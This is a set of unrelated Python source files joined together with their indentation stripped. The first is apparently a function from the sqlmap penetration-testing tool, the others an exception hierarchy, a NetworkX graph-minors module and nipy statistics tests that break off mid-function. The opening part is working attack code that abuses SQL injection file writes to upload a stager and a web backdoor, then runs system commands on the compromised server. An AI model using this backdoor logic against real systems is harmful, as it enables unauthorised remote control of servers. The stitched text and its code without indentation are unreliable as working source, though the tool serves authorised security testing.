if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
return
self.checkDbmsOs()
default = None
choices = list(getPublicTypeMembers(WEB_API, True))
for ext in choices:
if conf.url.endswith(ext):
default = ext
break
if not default:
default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP
message = "which web application language does the web server "
message += "support?\n"
for count in xrange(len(choices)):
ext = choices[count]
message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))
if default == ext:
default = count + 1
message = message[:-1]
while True:
choice = readInput(message, default=str(default))
if not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > len(choices):
logger.warn("invalid value, it must be between 1 and %d" % len(choices))
else:
self.webApi = choices[int(choice) - 1]
break
directories = list(arrayizeValue(getManualDirectories()))
directories.extend(getAutoDirectories())
directories = list(oset(directories))
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
for directory in directories:
if not directory:
continue
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
uploaded = False
directory = ntToPosixSlashes(normalizePath(directory))
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
directory = "/%s" % directory
else:
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
if not directory.endswith('/'):
directory += '/'
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
# Fall-back to UNION queries file upload method
if not uploaded:
warnMsg = "unable to upload the file stager "
warnMsg += "on '%s'" % directory
singleTimeWarnMessage(warnMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via UNION method"
logger.info(infoMsg)
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
handle, filename = tempfile.mkstemp()
os.close(handle)
with open(filename, "w+b") as f:
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
_ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
f.write(_)
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
if not uploaded:
continue
if "<%" in uplPage or "<?" in uplPage:
warnMsg = "file stager uploaded on '%s', " % directory
warnMsg += "but not dynamically interpreted"
logger.warn(warnMsg)
continue
elif self.webApi == WEB_API.ASPX:
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
logger.info(infoMsg)
if self.webApi == WEB_API.ASP:
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match:
backdoorDirectory = match.group(1)
else:
continue
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory
else:
continue
else:
if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "through the file stager possibly because "
warnMsg += "the user running the web server process "
warnMsg += "has not write privileges over the folder "
warnMsg += "where the user running the DBMS process "
warnMsg += "was able to upload the file stager or "
warnMsg += "because the DBMS and web server sit on "
warnMsg += "different servers"
logger.warn(warnMsg)
message = "do you want to try the same method used "
message += "for the file stager? [Y/n] "
getOutput = readInput(message, default="Y")
if getOutput in ("y", "Y"):
self._webFileInject(backdoorContent, backdoorName, directory)
else:
continue
self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
self.webDirectory = directory
self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
testStr = "command execution test"
output = self.webBackdoorRunCmd("echo %s" % testStr)
if output == "0":
warnMsg = "the backdoor has been uploaded but required privileges "
warnMsg += "for running the system commands are missing"
raise SqlmapNoneDataException(warnMsg)
elif output and testStr in output:
infoMsg = "the backdoor has been successfully "
else:
infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s' - " % self.webDirectory
infoMsg += self.webBackdoorUrl
logger.info(infoMsg)
break
| |
"""Exception hierarchy for abd user and system errors."""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# abdt_exception
#
# Public Classes:
# AbdBaseException
# AbdUserException
# AbdSystemException
# MissingBaseException
# NoUsersOnBranchException
# LargeDiffException
# CommitMessageParseException
# LandingException
# LandingPushBaseException
# ReviewAbandonedException
# NoHistoryException
# NoDiffException
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class AbdBaseException(Exception):
def __init__(self, message):
"""Base for abd exceptions to inherit from.
:message: the message to report
"""
message = (
"abdt_exception__BaseException:\n" +
str(message) + "\n")
super(AbdBaseException, self).__init__(message)
class AbdUserException(AbdBaseException):
def __init__(self, message):
"""Base for abd user-triggered exceptions to inherit from.
:message: the message to report
"""
message = (
"abdt_exception__UserException:\n" +
str(message) + "\n")
super(AbdUserException, self).__init__(message)
class AbdSystemException(AbdBaseException):
def __init__(self, message):
"""Base for abd system-triggered exceptions to inherit from.
:message: the message to report
"""
message = (
"abdt_exception__UserException:\n" +
str(message) + "\n")
super(AbdSystemException, self).__init__(message)
# TODO: add BadBranchNameException
# TODO: add UnrelatedBaseException
# TODO: add EmptyDiffException
# TODO: add NotPhabricatorUserException
class MissingBaseException(AbdUserException):
def __init__(self, review_branch_name, description, base_name):
"""Branch which the review branch is based on does not exist.
:review_branch_name: name of the branch being reviewed
:description: description part of the branch
:base_name: name of the missing base branch
"""
message = (
"abdt_exception__MissingBaseException:\n" +
"review_branch_name: '" + str(review_branch_name) + "'\n" +
"description: '" + str(description) + "'\n" +
"base_name: '" + str(base_name) + "'\n")
super(MissingBaseException, self).__init__(message)
self.review_branch_name = review_branch_name
self.description = description
self.base_name = base_name
class NoUsersOnBranchException(AbdUserException):
def __init__(self, review_branch_name, base_name, emails):
"""Branch does not contain commits by any known users.
:review_branch_name: name of the branch being reviewed
:base_name: name of the missing base branch
:emails: email addresses of authors on the branch
"""
message = (
"abdt_exception__NoUsersOnBranchException:\n" +
"review_branch_name: '" + str(review_branch_name) + "'\n" +
"base_name: '" + str(base_name) + "'\n" +
"emails: '" + str(emails) + "'\n")
super(NoUsersOnBranchException, self).__init__(message)
self.review_branch_name = review_branch_name
self.base_name = base_name
self.emails = emails
class LargeDiffException(AbdUserException):
def __init__(self, diff_summary, diff_len, diff_len_limit):
"""Describe failure to create small enough diff.
:diff_summary: a textual summary of the diff, e.g. diff --stat
:diff_len: the size of the diff
:diff_len_limit: the size limit for diffs
"""
message = (
"abdt_exception__LargeDiffException:\n"
"diff_summary: '" + str(diff_summary) + "'\n"
"diff_len: '" + str(diff_len) + "'\n"
"diff_len_limit: '" + str(diff_len_limit) + "'\n")
super(LargeDiffException, self).__init__(message)
self.diff_summary = diff_summary
self.diff_len = diff_len
self.diff_len_limit = diff_len_limit
class CommitMessageParseException(AbdUserException):
def __init__(self, errors, fields, digest):
"""Describe failure to create fields suitable for review.
:errors: errors reported by Phabricator
:fields: the resulting fields response (if any)
:digest: a digest of the commit messages
"""
message = (
"abdt_exception__CommitMessageParseException:\n" +
"errors: '" + str(errors) + "'\n" +
"fields: '" + str(fields) + "'\n" +
"digest: '" + str(digest) + "'\n")
super(CommitMessageParseException, self).__init__(message)
self.errors = errors
self.fields = fields
self.digest = digest
class LandingException(AbdUserException):
def __init__(self, message, review_branch_name, base_name):
"""Describe failure to land a review.
:message: any available error message
:review_branch_name: name of the branch being reviewed
:base_name: name of the base branch
"""
new_message = (
"abdt_exception__LandingException:\n" +
"message: '" + str(message) + "'\n" +
"review_branch_name: '" + str(review_branch_name) + "'\n" +
"base_name: '" + str(base_name) + "'\n")
super(LandingException, self).__init__(new_message)
self.review_branch_name = review_branch_name
self.base_name = base_name
class LandingPushBaseException(AbdUserException):
def __init__(self, message, review_branch_name, base_name):
"""Describe failure to land a review at the push new base stage.
:message: any available error message
:review_branch_name: name of the branch being reviewed
:base_name: name of the base branch
"""
new_message = (
"abdt_exception__LandingPushBaseException:\n" +
"message: '" + str(message) + "'\n" +
"review_branch_name: '" + str(review_branch_name) + "'\n" +
"base_name: '" + str(base_name) + "'\n")
super(LandingPushBaseException, self).__init__(new_message)
self.review_branch_name = review_branch_name
self.base_name = base_name
class ReviewAbandonedException(AbdUserException):
def __init__(self):
"""Describe the situation of a review being abandoned by the author."""
message = "abdt_exception__ReviewAbandonedException"
super(ReviewAbandonedException, self).__init__(message)
class NoHistoryException(AbdUserException):
def __init__(self, review_branch_name, base_name):
"""Describe a review having no commits beyond base.
:review_branch_name: the string name of the review branch
:base_name: the string name of the branch the review lands on
"""
message = "abdt_exception__NoHistoryException"
super(NoHistoryException, self).__init__(message)
self.review_branch_name = review_branch_name
self.base_name = base_name
class NoDiffException(AbdUserException):
def __init__(self, base_name, review_branch_name, review_branch_hash):
"""Describe a review having no difference against it's base.
:base_name: the string name of the branch the review lands on
:review_branch_name: the string name of the review branch
:review_branch_hash: the string commit hash of the review branch
"""
message = "abdt_exception__NoDiffException"
super(NoDiffException, self).__init__(message)
self.base_name = base_name
self.review_branch_name = review_branch_name
self.review_branch_hash = review_branch_hash
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
| |
# minors.py - functions for computing minors of graphs
#
# Copyright 2015 Jeffrey Finkelstein <jeffrey.finkelstein@gmail.com>.
# Copyright 2010 Drew Conway <drew.conway@nyu.edu>
# Copyright 2010 Aric Hagberg <hagberg@lanl.gov>
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
"""Provides functions for computing minors of a graph."""
from itertools import chain
from itertools import combinations
from itertools import permutations
from itertools import product
import networkx as nx
from networkx import density
from networkx.exception import NetworkXException
from networkx.utils import arbitrary_element
__all__ = ['contracted_edge', 'contracted_nodes',
'identified_nodes', 'quotient_graph', 'blockmodel']
chaini = chain.from_iterable
def equivalence_classes(iterable, relation):
"""Returns the set of equivalence classes of the given ``iterable`` under
the specified equivalence relation.
``relation`` must be a Boolean-valued function that takes two argument. It
must represent an equivalence relation (that is, the relation induced by
the function must be reflexive, symmetric, and transitive).
The return value is a set of sets. It is a partition of the elements of
``iterable``; duplicate elements will be ignored so it makes the most sense
for ``iterable`` to be a :class:`set`.
"""
# For simplicity of implementation, we initialize the return value as a
# list of lists, then convert it to a set of sets at the end of the
# function.
blocks = []
# Determine the equivalence class for each element of the iterable.
for y in iterable:
# Each element y must be in *exactly one* equivalence class.
#
# Each block is guaranteed to be non-empty
for block in blocks:
x = arbitrary_element(block)
if relation(x, y):
block.append(y)
break
else:
# If the element y is not part of any known equivalence class, it
# must be in its own, so we create a new singleton equivalence
# class for it.
blocks.append([y])
return {frozenset(block) for block in blocks}
def quotient_graph(G, partition, edge_relation=None, node_data=None,
edge_data=None, relabel=False, create_using=None):
"""Returns the quotient graph of ``G`` under the specified equivalence
relation on nodes.
Parameters
----------
G : NetworkX graph
The graph for which to return the quotient graph with the
specified node relation.
partition : function or list of sets
If a function, this function must represent an equivalence
relation on the nodes of ``G``. It must take two arguments *u*
and *v* and return ``True`` exactly when *u* and *v* are in the
same equivalence class. The equivalence classes form the nodes
in the returned graph.
If a list of sets, the list must form a valid partition of
the nodes of the graph. That is, each node must be in exactly
one block of the partition.
edge_relation : Boolean function with two arguments
This function must represent an edge relation on the *blocks* of
``G`` in the partition induced by ``node_relation``. It must
take two arguments, *B* and *C*, each one a set of nodes, and
return ``True`` exactly when there should be an edge joining
block *B* to block *C* in the returned graph.
If ``edge_relation`` is not specified, it is assumed to be the
following relation. Block *B* is related to block *C* if and
only if some node in *B* is adjacent to some node in *C*,
according to the edge set of ``G``.
edge_data : function
This function takes two arguments, *B* and *C*, each one a set
of nodes, and must return a dictionary representing the edge
data attributes to set on the edge joining *B* and *C*, should
there be an edge joining *B* and *C* in the quotient graph (if
no such edge occurs in the quotient graph as determined by
``edge_relation``, then the output of this function is ignored).
If the quotient graph would be a multigraph, this function is
not applied, since the edge data from each edge in the graph
``G`` appears in the edges of the quotient graph.
node_data : function
This function takes one argument, *B*, a set of nodes in ``G``,
and must return a dictionary representing the node data
attributes to set on the node representing *B* in the quotient graph.
If ``None``, the following node attributes will be set:
* ``'graph'``, the subgraph of the graph ``G`` that this block
represents,
* ``'nnodes'``, the number of nodes in this block,
* ``'nedges'``, the number of edges within this block,
* ``'density'``, the density of the subgraph of ``G`` that this
block represents.
relabel : bool
If ``True``, relabel the nodes of the quotient graph to be
nonnegative integers. Otherwise, the nodes are identified with
:class:`frozenset` instances representing the blocks given in
``partition``.
create_using : NetworkX graph
If specified, this must be an instance of a NetworkX graph
class. The nodes and edges of the quotient graph will be added
to this graph and returned. If not specified, the returned graph
will have the same type as the input graph.
Returns
-------
NetworkX graph
The quotient graph of ``G`` under the equivalence relation
specified by ``partition``. If the partition were given as a
list of :class:`set` instances and ``relabel`` is ``False``,
each node will be a :class:`frozenset` corresponding to the same
:class:`set`.
Raises
------
NetworkXException
If the given partition is not a valid partition of the nodes of
``G``.
Examples
--------
The quotient graph of the complete bipartite graph under the "same
neighbors" equivalence relation is `K_2`. Under this relation, two nodes
are equivalent if they are not adjacent but have the same neighbor set::
>>> import networkx as nx
>>> G = nx.complete_bipartite_graph(2, 3)
>>> same_neighbors = lambda u, v: (u not in G[v] and v not in G[u]
... and G[u] == G[v])
>>> Q = nx.quotient_graph(G, same_neighbors)
>>> K2 = nx.complete_graph(2)
>>> nx.is_isomorphic(Q, K2)
True
The quotient graph of a directed graph under the "same strongly connected
component" equivalence relation is the condensation of the graph (see
:func:`condensation`). This example comes from the Wikipedia article
*`Strongly connected component`_*::
>>> import networkx as nx
>>> G = nx.DiGraph()
>>> edges = ['ab', 'be', 'bf', 'bc', 'cg', 'cd', 'dc', 'dh', 'ea',
... 'ef', 'fg', 'gf', 'hd', 'hf']
>>> G.add_edges_from(tuple(x) for x in edges)
>>> components = list(nx.strongly_connected_components(G))
>>> sorted(sorted(component) for component in components)
[['a', 'b', 'e'], ['c', 'd', 'h'], ['f', 'g']]
>>>
>>> C = nx.condensation(G, components)
>>> component_of = C.graph['mapping']
>>> same_component = lambda u, v: component_of[u] == component_of[v]
>>> Q = nx.quotient_graph(G, same_component)
>>> nx.is_isomorphic(C, Q)
True
Node identification can be represented as the quotient of a graph under the
equivalence relation that places the two nodes in one block and each other
node in its own singleton block::
>>> import networkx as nx
>>> K24 = nx.complete_bipartite_graph(2, 4)
>>> K34 = nx.complete_bipartite_graph(3, 4)
>>> C = nx.contracted_nodes(K34, 1, 2)
>>> nodes = {1, 2}
>>> is_contracted = lambda u, v: u in nodes and v in nodes
>>> Q = nx.quotient_graph(K34, is_contracted)
>>> nx.is_isomorphic(Q, C)
True
>>> nx.is_isomorphic(Q, K24)
True
The blockmodeling technique described in [1]_ can be implemented as a
quotient graph::
>>> G = nx.path_graph(6)
>>> partition = [{0, 1}, {2, 3}, {4, 5}]
>>> M = nx.quotient_graph(G, partition, relabel=True)
>>> list(M.edges())
[(0, 1), (1, 2)]
.. _Strongly connected component: https://en.wikipedia.org/wiki/Strongly_connected_component
References
----------
.. [1] Patrick Doreian, Vladimir Batagelj, and Anuska Ferligoj.
*Generalized Blockmodeling*.
Cambridge University Press, 2004.
"""
# If the user provided an equivalence relation as a function compute
# the blocks of the partition on the nodes of G induced by the
# equivalence relation.
if callable(partition):
partition = equivalence_classes(G, partition)
# Each node in the graph must be in exactly one block.
if any(sum(1 for b in partition if v in b) != 1 for v in G):
raise NetworkXException('each node must be in exactly one block')
H = type(create_using)() if create_using is not None else type(G)()
# By default set some basic information about the subgraph that each block
# represents on the nodes in the quotient graph.
if node_data is None:
def node_data(b):
S = G.subgraph(b)
return dict(graph=S, nnodes=len(S), nedges=S.number_of_edges(),
density=density(S))
# Each block of the partition becomes a node in the quotient graph.
partition = [frozenset(b) for b in partition]
H.add_nodes_from((b, node_data(b)) for b in partition)
# By default, the edge relation is the relation defined as follows. B is
# adjacent to C if a node in B is adjacent to a node in C, according to the
# edge set of G.
#
# This is not a particularly efficient implementation of this relation:
# there are O(n^2) pairs to check and each check may require O(log n) time
# (to check set membership). This can certainly be parallelized.
if edge_relation is None:
def edge_relation(b, c):
return any(v in G[u] for u, v in product(b, c))
# By default, sum the weights of the edges joining pairs of nodes across
# blocks to get the weight of the edge joining those two blocks.
if edge_data is None:
def edge_data(b, c):
edgedata = (d for u, v, d in G.edges(b | c, data=True)
if (u in b and v in c) or (u in c and v in b))
return {'weight': sum(d.get('weight', 1) for d in edgedata)}
block_pairs = permutations(H, 2) if H.is_directed() else combinations(H, 2)
# In a multigraph, add one edge in the quotient graph for each edge
# in the original graph.
if H.is_multigraph():
edges = chaini(((b, c, G.get_edge_data(u, v, default={}))
for u, v in product(b, c) if v in G[u])
for b, c in block_pairs if edge_relation(b, c))
# In a simple graph, apply the edge data function to each pair of
# blocks to determine the edge data attributes to apply to each edge
# in the quotient graph.
else:
edges = ((b, c, edge_data(b, c)) for (b, c) in block_pairs
if edge_relation(b, c))
H.add_edges_from(edges)
# If requested by the user, relabel the nodes to be integers,
# numbered in increasing order from zero in the same order as the
# iteration order of ``partition``.
if relabel:
# Can't use nx.convert_node_labels_to_integers() here since we
# want the order of iteration to be the same for backward
# compatibility with the nx.blockmodel() function.
labels = {b: i for i, b in enumerate(partition)}
H = nx.relabel_nodes(H, labels)
return H
def contracted_nodes(G, u, v, self_loops=True):
"""Returns the graph that results from contracting ``u`` and ``v``.
Node contraction identifies the two nodes as a single node incident to any
edge that was incident to the original two nodes.
Parameters
----------
G : NetworkX graph
The graph whose nodes will be contracted.
u, v : nodes
Must be nodes in ``G``.
self_loops : Boolean
If this is ``True``, any edges joining ``u`` and ``v`` in ``G`` become
self-loops on the new node in the returned graph.
Returns
-------
Networkx graph
A new graph object of the same type as ``G`` (leaving ``G`` unmodified)
with ``u`` and ``v`` identified in a single node. The right node ``v``
will be merged into the node ``u``, so only ``u`` will appear in the
returned graph.
Examples
--------
Contracting two nonadjacent nodes of the cycle graph on four nodes `C_4`
yields the path graph (ignoring parallel edges)::
>>> import networkx as nx
>>> G = nx.cycle_graph(4)
>>> M = nx.contracted_nodes(G, 1, 3)
>>> P3 = nx.path_graph(3)
>>> nx.is_isomorphic(M, P3)
True
See also
--------
contracted_edge
quotient_graph
Notes
-----
This function is also available as ``identified_nodes``.
"""
H = G.copy()
if H.is_directed():
in_edges = ((w, u, d) for w, x, d in G.in_edges(v, data=True)
if self_loops or w != u)
out_edges = ((u, w, d) for x, w, d in G.out_edges(v, data=True)
if self_loops or w != u)
new_edges = chain(in_edges, out_edges)
else:
new_edges = ((u, w, d) for x, w, d in G.edges(v, data=True)
if self_loops or w != u)
v_data = H.node[v]
H.remove_node(v)
H.add_edges_from(new_edges)
if 'contraction' in H.node[u]:
H.node[u]['contraction'][v] = v_data
else:
H.node[u]['contraction'] = {v: v_data}
return H
identified_nodes = contracted_nodes
def contracted_edge(G, edge, self_loops=True):
"""Returns the graph that results from contracting the specified edge.
Edge contraction identifies the two endpoints of the edge as a single node
incident to any edge that was incident to the original two nodes. A graph
that results from edge contraction is called a *minor* of the original
graph.
Parameters
----------
G : NetworkX graph
The graph whose edge will be contracted.
edge : tuple
Must be a pair of nodes in ``G``.
self_loops : Boolean
If this is ``True``, any edges (including ``edge``) joining the
endpoints of ``edge`` in ``G`` become self-loops on the new node in the
returned graph.
Returns
-------
Networkx graph
A new graph object of the same type as ``G`` (leaving ``G`` unmodified)
with endpoints of ``edge`` identified in a single node. The right node
of ``edge`` will be merged into the left one, so only the left one will
appear in the returned graph.
Raises
------
ValueError
If ``edge`` is not an edge in ``G``.
Examples
--------
Attempting to contract two nonadjacent nodes yields an error::
>>> import networkx as nx
>>> G = nx.cycle_graph(4)
>>> nx.contracted_edge(G, (1, 3))
Traceback (most recent call last):
...
ValueError: Edge (1, 3) does not exist in graph G; cannot contract it
Contracting two adjacent nodes in the cycle graph on *n* nodes yields the
cycle graph on *n - 1* nodes::
>>> import networkx as nx
>>> C5 = nx.cycle_graph(5)
>>> C4 = nx.cycle_graph(4)
>>> M = nx.contracted_edge(C5, (0, 1), self_loops=False)
>>> nx.is_isomorphic(M, C4)
True
See also
--------
contracted_nodes
quotient_graph
"""
if not G.has_edge(*edge):
raise ValueError('Edge {0} does not exist in graph G; cannot contract'
' it'.format(edge))
return contracted_nodes(G, *edge, self_loops=self_loops)
def blockmodel(G, partition, multigraph=False):
"""Returns a reduced graph constructed using the generalized block modeling
technique.
The blockmodel technique collapses nodes into blocks based on a
given partitioning of the node set. Each partition of nodes
(block) is represented as a single node in the reduced graph.
Edges between nodes in the block graph are added according to the
edges in the original graph. If the parameter multigraph is False
(the default) a single edge is added with a weight equal to the
sum of the edge weights between nodes in the original graph
The default is a weight of 1 if weights are not specified. If the
parameter multigraph is True then multiple edges are added each
with the edge data from the original graph.
Parameters
----------
G : graph
A networkx Graph or DiGraph
partition : list of lists, or list of sets
The partition of the nodes. Must be non-overlapping.
multigraph : bool, optional
If True return a MultiGraph with the edge data of the original
graph applied to each corresponding edge in the new graph.
If False return a Graph with the sum of the edge weights, or a
count of the edges if the original graph is unweighted.
Returns
-------
blockmodel : a Networkx graph object
Examples
--------
>>> G = nx.path_graph(6)
>>> partition = [[0,1],[2,3],[4,5]]
>>> M = nx.blockmodel(G,partition)
References
----------
.. [1] Patrick Doreian, Vladimir Batagelj, and Anuska Ferligoj
"Generalized Blockmodeling",Cambridge University Press, 2004.
Notes
-----
This function has been deprecated. Please use ``quotient_graph`` instead.
"""
if multigraph:
return nx.quotient_graph(G, partition,
create_using=nx.MultiGraph(), relabel=True)
else:
return nx.quotient_graph(G, partition, relabel=True)
| |
import numpy as np
import numpy.linalg as L
import numpy.random as R
from nipy.testing import assert_equal, assert_almost_equal, dec
from nipy.algorithms.statistics import intvol, utils
def symnormal(p=10):
M = R.standard_normal((p,p))
return (M + M.T) / np.sqrt(2)
def randorth(p=10):
"""
A random orthogonal matrix.
"""
A = symnormal(p)
return L.eig(A)[1]
def box(shape, edges):
data = np.zeros(shape)
sl = []
for i in range(len(shape)):
sl.append(slice(edges[i][0], edges[i][1],1))
data[sl] = 1
return data.astype(np.int)
def randombox(shape):
"""
Generate a random box, returning the box and the edge lengths
"""
edges = [R.random_integers(0, shape[j], size=(2,))
for j in range(len(shape))]
for j in range(len(shape)):
edges[j].sort()
if edges[j][0] == edges[j][1]:
edges[j][0] = 0; edges[j][1] = shape[j]/2+1
return edges, box(shape, edges)
def elsym(edgelen, order=1):
"""
Elementary symmetric polynomial of a given order
"""
l = len(edgelen)
if order == 0:
return 1
r = 0
for v in utils.combinations(range(l), order):
r += np.product([edgelen[vv] for vv in v])
return r
def nonintersecting_boxes(shape):
"""
The Lips's are supposed to be additive, so disjoint things
should be additive. But, if they ALMOST intersect, different
things get added to the triangulation.
>>> b1 = np.zeros(40, np.int)
>>> b1[:11] = 1
>>> b2 = np.zeros(40, np.int)
>>> b2[11:] = 1
>>> (b1*b2).sum()
0
>>> c = np.indices((40,)).astype(np.float)
>>> intvol.Lips1d(c, b1)
10.0
>>> intvol.Lips1d(c, b2)
28.0
>>> intvol.Lips1d(c, b1+b2)
39.0
The function creates two boxes such that
the 'dilated' box1 does not intersect with box2.
Additivity works in this case.
"""
while True:
edge1, box1 = randombox(shape)
edge2, box2 = randombox(shape)
diledge1 = [[max(ed[0]-1, 0), min(ed[1]+1, sh)]
for ed, sh in zip(edge1, box1.shape)]
dilbox1 = box(box1.shape, diledge1)
if set(np.unique(dilbox1 + box2)).issubset([0,1]):
break
return box1, box2, edge1, edge2
def test_mu3tet():
assert_equal(intvol.mu3_tet(0,0,0,0,1,0,0,1,0,1), 1./6)
def test_mu2tri():
assert_equal(intvol.mu2_tri(0,0,0,1,0,1), 1./2)
def test_mu1tri():
assert_equal(intvol.mu1_tri(0,0,0,1,0,1), 1+np.sqrt(2)/2)
def test_mu2tet():
assert_equal(intvol.mu2_tet(0,0,0,0,1,0,0,1,0,1), (3./2 + np.sqrt(3./4))/2)
def test_ec():
for i in range(1, 4):
_, box1 = randombox((40,)*i)
f = {3:intvol.EC3d,
2:intvol.EC2d,
1:intvol.EC1d}[i]
yield assert_almost_equal, f(box1), 1
def test_ec_disjoint():
for i in range(1, 4):
e = {3:intvol.EC3d,
2:intvol.EC2d,
1:intvol.EC1d}[i]
box1, box2, _, _ = nonintersecting_boxes((40,)*i)
yield assert_almost_equal, e(box1 + box2), e(box1) + e(box2)
def test_lips1_disjoint():
phi = intvol.Lips1d
box1, box2, edge1, edge2 = nonintersecting_boxes((30,))
c = np.indices((30,)).astype(np.float)
d = np.random.standard_normal((10,)+(30,))
U = randorth(p=6)[:1]
e = np.dot(U.T, c.reshape((c.shape[0], np.product(c.shape[1:]))))
e.shape = (e.shape[0],) + c.shape[1:]
yield assert_almost_equal, phi(c, box1 + box2), \
phi(c, box1) + phi(c, box2)
yield assert_almost_equal, phi(d, box1 + box2), \
phi(d, box1) + phi(d, box2)
yield assert_almost_equal, phi(e, box1 + box2), \
phi(e, box1) + phi(e, box2)
yield assert_almost_equal, phi(e, box1 + box2), phi(c, box1 + box2)
yield assert_almost_equal, phi(e, box1 + box2), \
(np.array([elsym([e[1]-e[0]-1 for e in edge1], i) for i in range(2)])+
np.array([elsym([e[1]-e[0]-1 for e in edge2], i) for i in range(2)]))
@dec.slow
def test_lips2_disjoint():
phi = intvol.Lips2d
box1, box2, edge1, edge2 = nonintersecting_boxes((40,40))
c = np.indices((40,40)).astype(np.float)
d = np.random.standard_normal((40,40,40))
U = randorth(p=6)[0:2]
e = np.dot(U.T, c.reshape((c.shape[0], np.product(c.shape[1:]))))
e.shape = (e.shape[0],) + c.shape[1:]
yield assert_almost_equal, phi(c, box1 + box2), phi(c, box1) + \
phi(c, box2)
yield assert_almost_equal, phi(d, box1 + box2), phi(d, box1) + \
phi(d, box2)
yield assert_almost_equal, phi(e, box1 + box2), phi(e, box1) + \
phi(e, box2)
yield assert_almost_equal, phi(e, box1 + box2), phi(c, box1 + box2)
yield assert_almost_equal, phi(e, box1 + box2), \
(np.array([elsym([e[1]-e[0]-1 for e in edge1], i) for i in range(3)]) +
np.array([elsym([e[1]-e[0]-1 for e in edge2], i) for i in range(3)]))
@dec.slow
def test_lips3_disjoint():
phi = intvol.Lips3d
box1, box2, edge1, edge2 = nonintersecting_boxes((40,)*3)
c = np.indices((40,)*3).astype(np.float)
d = np.random.standard_normal((40,40,40,40))
U = randorth(p=6)[0:3]
e = np.dot(U.T, c.reshape((c.shape[0], np.product(c.shape[1:]))))
e.shape = (e.shape[0],) + c.shape[1:]
yield assert_almost_equal, phi(c, box1 + box2), phi(c, box1) + phi(c, box2)
yield assert_almost_equal, phi(d, box1 + box2), phi(d, box1) + phi(d, box2)
yield assert_almost_equal, phi(e, box1 + box2), phi(e, box1) + phi(e, box2)
yield assert_almost_equal, phi(e, box1 + box2), phi(c, box1 + box2)
yield assert_almost_equal, phi(e, box1 + box2), \
(np.array([elsym([e[1]-e[0]-1 for e in edge1], i) for i in range(4)]) +
np.array([elsym([e[1]-e[0]-1 for e in edge2], i) for i in range(4)]))
def test_slices():
# Slices have EC 1...
